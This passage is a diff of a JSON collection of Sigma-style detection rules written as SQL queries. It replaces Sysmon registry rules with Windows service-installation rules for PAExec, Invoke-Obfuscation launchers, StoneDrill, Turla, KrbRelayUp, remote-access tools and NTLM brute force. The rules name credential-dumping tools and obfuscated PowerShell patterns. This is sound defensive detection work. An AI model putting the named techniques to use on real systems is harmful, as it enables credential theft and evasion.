LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "status": "experimental", - "description": 
"Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "description": "Detects PAExec service installation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ 
"attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND 
Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate new entry 
added by windows" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded 
Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + 
"filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": 
"win_system_service_install_remote_utilities.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the 
result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "status": "experimental", + "description": "Detects NetSupport Manager service installation on the target system.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative action" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate administrative action" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + 
"SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock 
'@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "status": "test", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.defense_evasion", - "attack.t1564" + 
"attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Legitimate administrative action" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", 
